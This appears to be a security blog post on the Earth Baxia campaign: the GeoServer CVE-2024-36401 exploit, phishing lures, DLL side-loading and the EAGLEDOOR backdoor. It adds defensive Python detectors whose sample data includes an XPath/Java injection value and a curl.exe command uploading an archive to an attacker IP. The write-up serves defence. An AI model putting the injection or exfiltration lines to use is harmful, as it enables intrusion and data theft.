
Hoplon InfoSec
24 Sep, 2024
Researchers at Trend Micro have documented an intrusion campaign by a China-linked advanced persistent threat (APT) group they track as Earth Baxia. The group exploits a vulnerability in GeoServer, a widely deployed open-source server for sharing and processing geospatial data, to gain a foothold and ultimately deploy a backdoor named EAGLEDOOR. This post covers the vulnerability, the attack chain, the malware's command-and-control design, and recommendations for defending against it.
GeoServer is an open-source server written in Java that lets users share, process, and edit geospatial data through standard OGC interfaces such as WMS and WFS. It supports many data formats and integrates with web mapping clients such as OpenLayers and Google Maps. That flexibility makes it a common, and frequently internet-facing, component of web mapping and spatial data infrastructure.
The primary vulnerability exploited by Earth Baxia is CVE-2024-36401, an unauthenticated remote code execution (RCE) flaw in GeoServer. The root cause is that GeoServer, through the GeoTools library it is built on, evaluated property names supplied in OGC requests as XPath expressions, and the XPath engine in use allowed arbitrary Java methods to be called; a single crafted request to an exposed WFS, WMS or WPS endpoint can therefore run code as the GeoServer process. The fix shipped in GeoServer 2.23.6, 2.24.4 and 2.25.2, and CISA added the CVE to its Known Exploited Vulnerabilities catalog in July 2024. Given how widely GeoServer is deployed, the flaw is a serious risk, particularly in sensitive sectors.
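Two offline checks a defender would want for this flaw, as an added example that is not code from the article, from Trend Micro, or from the GeoServer project: a version comparison against the fixed releases named in the GeoServer advisory, and a scan of web-server access-log lines for OGC requests whose property-name parameters contain a function call. A genuine property name never needs parentheses, so their presence in propertyName or valueReference is a strong signal of an XPath injection attempt. The log lines are constructed for the example, and the injected value is an assumption shaped like the flaw rather than a captured attack.

```python
"""
Added example; not code from the article, Trend Micro, or GeoServer.

  is_vulnerable_version()   - GeoServer version string vs. the first fixed
                              release of each line (2.23.6, 2.24.4, 2.25.2).
  find_suspicious_requests() - common-log-format lines -> OGC requests whose
                              property-name parameters carry a function call.

Limitation: WPS requests are usually POSTed XML, which an access log does not
show; inspect request bodies (WAF / reverse proxy) for those.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# First fixed patch level per release line; lines older than 2.23 never got
# the fix, lines newer than 2.25 shipped with it.
FIXED_PATCH = {(2, 23): 6, (2, 24): 4, (2, 25): 2}
FIRST_FIXED_LINE = (2, 23)

# Request parameters GeoServer treated as property names / XPath.
PROPERTY_PARAMS = {"propertyname", "valuereference"}
OGC_PATH = re.compile(r"/geoserver/(?:[^/\s]+/)*(?:wfs|wms|wps|ows)$", re.I)
LOG_REQUEST = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def parse_version(version):
    """'2.24.3-SNAPSHOT' -> (2, 24, 3); trailing qualifiers are ignored."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised GeoServer version: {version!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_vulnerable_version(version):
    major, minor, patch = parse_version(version)
    line = (major, minor)
    if line in FIXED_PATCH:
        return patch < FIXED_PATCH[line]
    return line < FIRST_FIXED_LINE


def request_indicators(target):
    """Return the suspicious 'param=value' pairs in one request target."""
    parts = urlsplit(target)
    if not OGC_PATH.search(parts.path):
        return []
    hits = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() not in PROPERTY_PARAMS:
            continue
        value = unquote(value)  # also catches double-encoded payloads
        if "(" in value or "java." in value.lower():
            hits.append(f"{key}={value}")
    return hits


def find_suspicious_requests(log_lines):
    """Return [(1-based line number, [indicators])] for lines worth triage."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        m = LOG_REQUEST.search(line)
        if m:
            hits = request_indicators(m.group("target"))
            if hits:
                findings.append((number, hits))
    return findings


# Constructed sample lines for the example (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Sep/2024:10:01:02 +0000] "GET /geoserver/wfs?service=WFS'
    '&version=2.0.0&request=GetFeature&typeNames=topp:states'
    '&propertyName=STATE_NAME HTTP/1.1" 200 5120',
    '203.0.113.9 - - [24/Sep/2024:10:03:44 +0000] "GET /geoserver/wfs?service=WFS'
    '&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites'
    '&valueReference=exec(java.lang.Runtime.getRuntime()%2C%27cmd%27) HTTP/1.1" 400 310',
    '10.0.0.8 - - [24/Sep/2024:10:05:00 +0000] "GET /geoserver/web/ HTTP/1.1" 200 8800',
]

if __name__ == "__main__":
    for v in ("2.22.5", "2.24.3", "2.25.2", "2.26.0"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "fixed")
    for number, hits in find_suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

The version string can be read from an instance's REST endpoint or its admin page; the log scanner is deliberately narrow (property-name parameters only) so that it fires on the injection shape rather than on every request that mentions GeoServer.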
Earth Baxia has primarily targeted government agencies, telecommunications providers, and the energy sector across several Asia-Pacific (APAC) countries, including Taiwan, the Philippines, South Korea, Vietnam, and Thailand. Alongside the server-side GeoServer exploit, the group relies on spear-phishing emails designed to trick individual recipients into opening malicious attachments.
The phishing arm of the campaign begins with spear-phishing emails carrying malicious MSC files (Microsoft Management Console snap-in files, not "Microsoft Common Script"), which Trend Micro tracks as RIPCOY. These attachments have nothing to do with the GeoServer flaw: opening one runs the code embedded in the MSC file, which stages the next payload on the victim's workstation. The GeoServer exploit is a separate, server-side entry point that needs no user interaction at all.
The infection chain employed by Earth Baxia is multi-staged and combines several techniques to get EAGLEDOOR onto a host without tripping defences: customized Cobalt Strike components for post-exploitation, a DLL side-loading loader, payloads staged on attacker-controlled web servers and pulled down with PowerShell, and a backdoor with several fallback command-and-control channels. Each is covered below.
Once initial access is achieved, Earth Baxia deploys customized Cobalt Strike components, staged alongside decoy documents on web servers the group controls, for post-exploitation before the EAGLEDOOR backdoor is dropped.
EAGLEDOOR can talk to its operators over several channels: DNS, HTTP, raw TCP, and the Telegram Bot API over HTTPS. If one channel is blocked or its infrastructure is taken down, the operators can fall back to another, which makes the backdoor resilient against partial disruption.
The EAGLEDOOR loader is delivered through DLL side-loading: a benign-looking executable, Systemsetting.exe, is placed next to a malicious Systemsetting.dll that it loads by name. Because the malicious code runs inside a process whose image looks legitimate, simple allow-lists and file-name-based detections are less likely to catch it.
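A heuristic for the side-loading pattern just described, as an added example that is not code from the article or from Trend Micro. It runs over constructed Sysmon Event ID 7 (Image loaded) records, using Sysmon's field names (Image for the process, ImageLoaded for the DLL, Signed and SignatureStatus for the DLL), and flags a DLL that sits beside its host process outside the usual trusted installation roots, either because it shares the executable's base name or because it is not validly signed. The records, paths and trusted roots are assumptions for the example.

```python
"""
Added example; not code from the article or from Trend Micro. Heuristic
DLL side-loading detection over constructed Sysmon Event ID 7 records.
"""
from pathlib import PureWindowsPath

# DLLs under these roots are excluded: legitimate software commonly ships an
# exe/dll pair with the same name there (msedge.exe / msedge.dll, for one).
TRUSTED_ROOTS = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)


def in_trusted_root(path):
    return str(path).lower().startswith(TRUSTED_ROOTS)


def side_load_reasons(event):
    """Return the reasons one image-load event looks like DLL side-loading."""
    exe = PureWindowsPath(event["Image"])
    dll = PureWindowsPath(event["ImageLoaded"])
    same_dir = str(exe.parent).lower() == str(dll.parent).lower()
    if not same_dir or in_trusted_root(dll):
        return []
    reasons = []
    if exe.stem.lower() == dll.stem.lower():
        reasons.append(f"{exe.name} loaded {dll.name} with the same base name "
                       "from its own directory (Systemsetting.exe pattern)")
    signed = event.get("Signed", "").lower() == "true"
    if not signed or event.get("SignatureStatus") != "Valid":
        reasons.append(f"{dll.name} is not validly signed and sits in a "
                       "user-writable directory beside its host process")
    return reasons


def find_side_loads(events):
    """Return [(process image, [reasons])] for events that need triage."""
    findings = []
    for event in events:
        reasons = side_load_reasons(event)
        if reasons:
            findings.append((event["Image"], reasons))
    return findings


# Constructed sample events for the example (not real telemetry).
SAMPLE_EVENTS = [
    {   # mirrors the loader described in the article
        "Image": r"C:\Users\alice\AppData\Roaming\SysCfg\Systemsetting.exe",
        "ImageLoaded": r"C:\Users\alice\AppData\Roaming\SysCfg\Systemsetting.dll",
        "Signed": "false", "SignatureStatus": "Unavailable",
    },
    {   # a real browser: same-name pair, but under Program Files and signed
        "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
        "ImageLoaded": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.dll",
        "Signed": "true", "SignatureStatus": "Valid",
    },
    {   # the Edge.exe / msedge.dll pair dropped in a user directory
        "Image": r"C:\Users\alice\Downloads\Edge.exe",
        "ImageLoaded": r"C:\Users\alice\Downloads\msedge.dll",
        "Signed": "false", "SignatureStatus": "Unavailable",
    },
    {   # ordinary system DLL load
        "Image": r"C:\Windows\System32\notepad.exe",
        "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
        "Signed": "true", "SignatureStatus": "Valid",
    },
]

if __name__ == "__main__":
    for image, reasons in find_side_loads(SAMPLE_EVENTS):
        print(image)
        for reason in reasons:
            print("   -", reason)
```

The trusted-root exclusion is what keeps the rule usable: many legitimate applications load a same-named DLL from their own install directory, so the signal is the combination of "beside the executable" and "outside the places software is normally installed", and the signature check catches renamed pairs such as Edge.exe with msedge.dll.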
EAGLEDOOR provides the operations a backdoor needs to keep control of a host: it receives and executes operator commands, collects information from the system, stages files for exfiltration, and reports back over whichever communication channel is available.
One of the more unusual aspects of EAGLEDOOR is its use of the Telegram Bot API for command and control (C2). The backdoor talks to a Telegram bot over the public API, polling it for new messages that carry operator commands and using the same API to send results back.
Because that traffic goes to Telegram's legitimate API endpoint over HTTPS, it blends in with ordinary web traffic and is not stopped by simple reputation-based controls. Defenders have to ask which processes are talking to Telegram, not just whether anyone is.
To evade detection and keep persistence on compromised systems, Earth Baxia relies on several layers of disguise: the DLL side-loading described above, file names that mimic legitimate Windows or browser components (Systemsetting.exe, Edge.exe, msedge.dll), and staged payloads served from innocuous-looking domains.
Exfiltration is handled deliberately. The collected data is first archived, then uploaded with curl.exe to a remote file server; Trend Micro identified one such server at 152.42.243.170. A legitimate built-in tool uploading an archive to an unfamiliar external host is exactly the kind of outbound activity that egress monitoring should flag.
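Two egress detections for the Telegram C2 channel and the curl.exe exfiltration described in the last few paragraphs, as an added example that is not code from the article or from Trend Micro. The first runs over constructed Sysmon Event ID 22 (DNS query) records and flags processes other than browsers resolving the Telegram Bot API host (api.telegram.org); the second runs over constructed Sysmon Event ID 1 (process create) records and flags curl.exe invocations that upload a file to a host outside an allow-list. Field names follow Sysmon (Image, QueryName, CommandLine); the events, the allow-lists and the hostnames are assumptions for the example.

```python
"""
Added example; not code from the article or from Trend Micro. Egress
detections over constructed Sysmon DNS (ID 22) and process (ID 1) records.
"""
import re
from pathlib import PureWindowsPath

TELEGRAM_API = "api.telegram.org"
# Processes that legitimately reach Telegram in this (assumed) environment.
TELEGRAM_ALLOWED = {"chrome.exe", "msedge.exe", "firefox.exe"}
# Hosts curl.exe is expected to upload to (assumed internal services).
UPLOAD_ALLOWED = {"artifacts.example.local"}

# curl options that send a local file or body. -d/--data is left out on
# purpose: ordinary API calls use it constantly and it would swamp the signal.
UPLOAD_FLAGS = re.compile(r"(?:^|\s)(?:-T|--upload-file|-F|--form|--data-binary)\s")
URL_HOST = re.compile(r"https?://([^/\s\"']+)", re.I)


def telegram_c2_candidates(dns_events):
    """Return [(process image, queried name)] for unexpected Telegram lookups."""
    hits = []
    for ev in dns_events:
        name = ev["QueryName"].lower().rstrip(".")
        if name != TELEGRAM_API and not name.endswith("." + TELEGRAM_API):
            continue
        proc = PureWindowsPath(ev["Image"]).name.lower()
        if proc not in TELEGRAM_ALLOWED:
            hits.append((ev["Image"], ev["QueryName"]))
    return hits


def curl_upload_candidates(proc_events):
    """Return [(command line, destination host)] for curl uploads off-list."""
    hits = []
    for ev in proc_events:
        if PureWindowsPath(ev["Image"]).name.lower() != "curl.exe":
            continue
        cmd = ev["CommandLine"]
        if not UPLOAD_FLAGS.search(cmd):
            continue
        for host in URL_HOST.findall(cmd):
            host = host.split("@")[-1].split(":")[0].lower()  # drop creds/port
            if host not in UPLOAD_ALLOWED:
                hits.append((cmd, host))
    return hits


# Constructed sample events for the example (not real telemetry).
SAMPLE_DNS = [
    {"Image": r"C:\Users\alice\AppData\Roaming\SysCfg\Systemsetting.exe",
     "QueryName": "api.telegram.org"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "QueryName": "api.telegram.org"},
    {"Image": r"C:\Users\alice\AppData\Roaming\SysCfg\Systemsetting.exe",
     "QueryName": "www.microsoft.com"},
]

SAMPLE_PROCS = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -T C:\Users\Public\archive.rar http://152.42.243.170/up"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r'curl.exe -F "file=@C:\temp\build.zip" https://artifacts.example.local/api/upload'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s https://www.example.com/"},
]

if __name__ == "__main__":
    for image, name in telegram_c2_candidates(SAMPLE_DNS):
        print(f"unexpected Telegram lookup: {image} -> {name}")
    for cmd, host in curl_upload_candidates(SAMPLE_PROCS):
        print(f"curl upload to off-list host {host}: {cmd}")
```

Neither rule blocks anything on its own; they produce triage candidates. The Telegram rule in particular is only as good as the allow-list, and a backdoor injected into a browser process would slip past it, which is why it belongs alongside the process-level side-loading check rather than in place of it.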
Earth Baxia uses more than one lure format for initial access, delivering its toolset through both MSC and LNK (Windows shortcut) files. Varying the attachment type raises the odds that at least one lure gets past mail filters and is opened by a recipient.
Researchers identified websites such as Static.krislab.site that Earth Baxia used to serve decoy documents alongside Cobalt Strike components. These sites hosted files including Edge.exe, msedge.dll, and Logs.txt, which were fetched and executed on the victim host with PowerShell commands.
Given these tactics, organizations should take proactive measures to safeguard their systems. The key recommendations follow.
Regular training sessions improve employees' ability to recognize phishing attempts and unusual attachments such as MSC and LNK files. A culture of security awareness reduces the likelihood that a lure is opened in the first place.
A multi-layered security approach is essential. For this campaign that means patching GeoServer to 2.23.6, 2.24.4, 2.25.2 or later and keeping its OGC endpoints off the open internet where possible; filtering MSC and LNK attachments at the mail gateway; endpoint detection that watches for DLL side-loading and PowerShell download activity; and egress monitoring for unexpected connections to Telegram's API and for uploads to unknown external hosts.
Together these layers can detect and contain an intrusion before it reaches its objectives.
Organizations should also maintain vigilant day-to-day practices: inventory and patch internet-facing software promptly, review web-server and endpoint logs for the indicators described above, and keep an incident response plan current and rehearsed.
The exploitation of GeoServer vulnerabilities by Earth Baxia underscores the evolving landscape of cyber threats. By understanding the tactics employed by threat actors and implementing robust security measures, organizations can better protect themselves against the risks posed by sophisticated malware like EAGLEDOOR. As the threat landscape continues to evolve, vigilance and proactive measures are key to maintaining cybersecurity resilience.
EAGLEDOOR is a backdoor malware deployed by the Earth Baxia APT group, allowing attackers to maintain control over compromised systems and exfiltrate data.
Earth Baxia exploits the CVE-2024-36401 vulnerability in GeoServer, allowing for remote code execution, which facilitates the deployment of their malware.
Government agencies, telecommunications, and energy sectors in APAC countries have been the primary targets of Earth Baxia’s attacks.
Organizations can protect themselves by implementing continuous phishing awareness training, deploying multi-layered security solutions, and maintaining vigilant cybersecurity practices.
Signs of compromise in this campaign include GeoServer requests whose property-name parameters carry XPath or Java expressions, unexpected Systemsetting.exe/Systemsetting.dll or Edge.exe/msedge.dll pairs in user-writable directories, processes other than browsers or messaging clients talking to api.telegram.org, and curl.exe uploading archives to unfamiliar external hosts, alongside the generic signs: unusual network traffic, unauthorized access attempts, and unexpected application behavior.
Senapathi, V. (2024, September 24). Chinese Hackers Exploiting GeoServer Flaw To Deploy EAGLEDOOR Malware. Cyber Security News. https://cybersecuritynews.com/chinese-hackers-exploit-geoserver-eagledoor/